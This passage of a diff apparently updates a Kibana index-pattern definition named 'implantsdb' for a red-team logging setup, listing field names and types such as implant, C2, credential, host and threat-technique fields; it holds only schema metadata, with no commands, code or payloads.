"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"user.name\"}}}]", "title": "implantsdb"}, "coreMigrationVersion": "7.16.3", "id": "implantsdb", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642171862691, 16], "type": "index-pattern", "version": "1"} \ No newline at end of file +{"attributes": {"fieldFormatMap": "{\"implantlogfile\":{\"id\":\"url\",\"params\":{\"parsedUrl\":{\"origin\":\"http://localhost:1080\",\"pathname\":\"/app/kibana\",\"basePath\":\"\"},\"urlTemplate\":\"{{rawValue}}\"}}}", "fields": "[{\"count\":0,\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_score\",\"type\":\"number\",\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"count\":0,\"name\":\"agent.ephemeral_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"agent.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.log.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.message\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.program\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"c2.timestamp\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"creds.credential\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.host\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.realm\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.source\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"creds.username\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ecs.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"error.stack_trace\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"error.stack_trace.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"error.stack_trace\"}}},{\"count\":0,\"name\":\"error.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.action\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.category\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.created\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.dataset\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.duration\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.end\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.hash\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.ingested\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.kind\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.module\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.outcome\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.provider\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.risk_score_norm\",\"type\":\"number\",\"esTypes\":[\"float\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.sequence\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.severity\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.start\",\"type\":\"date\",\"esTypes\":[\"date\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.timezone\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"event.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.directory_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.md5\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha1\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha256\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.hash.sha512\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path\"}}},{\"count\":0,\"name\":\"file.path_local\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.path_local.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"file.path_local\"}}},{\"count\":0,\"name\":\"file.size\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"file.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.architecture\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.domain_ext\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.as.organization.number\",\"type\":\"number\",\"esTypes\":[\"integer\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.city_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.continent_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.country_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.location\",\"type\":\"geo_point\",\"esTypes\":[\"geo_point\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_iso_code\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.geo.region_name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.hostname\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_ext\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.ip_int\",\"type\":\"ip\",\"esTypes\":[\"ip\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.mac\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.build\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.codename\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.family\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.full.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.full\"}}},{\"count\":0,\"name\":\"host.os.kernel\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"host.os.name\"}}},{\"count\":0,\"name\":\"host.os.platform\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.os.version\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"host.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.arch\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.checkin\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.input\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.link_mode\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.linked\",\"type\":\"boolean\",\"esTypes\":[\"boolean\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.log_file\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.output\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"implant.parent_id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.sleep\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.task\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"implant.url\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"input.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"ioc.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.file.path\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.flags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.level\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.logger\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.offset\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.line\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.file.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.origin.function\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.original\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.source.address\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.facility.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.priority\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.code\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"log.syslog.severity.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"count\":0,\"name\":\"process.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"process.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"process.name\"}}},{\"count\":0,\"name\":\"process.pid\",\"type\":\"number\",\"esTypes\":[\"long\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.full\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"screenshot.thumb\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"service.type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.framework\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.tactic.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.id\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"threat.technique.name.text\",\"type\":\"string\",\"esTypes\":[\"text\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false,\"subType\":{\"multi\":{\"parent\":\"threat.technique.name\"}}},{\"count\":0,\"name\":\"threat.technique.reference\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.domain\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"count\":0,\"name\":\"user.email\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"scripted\":false,\"searchable\":true,\"aggregatab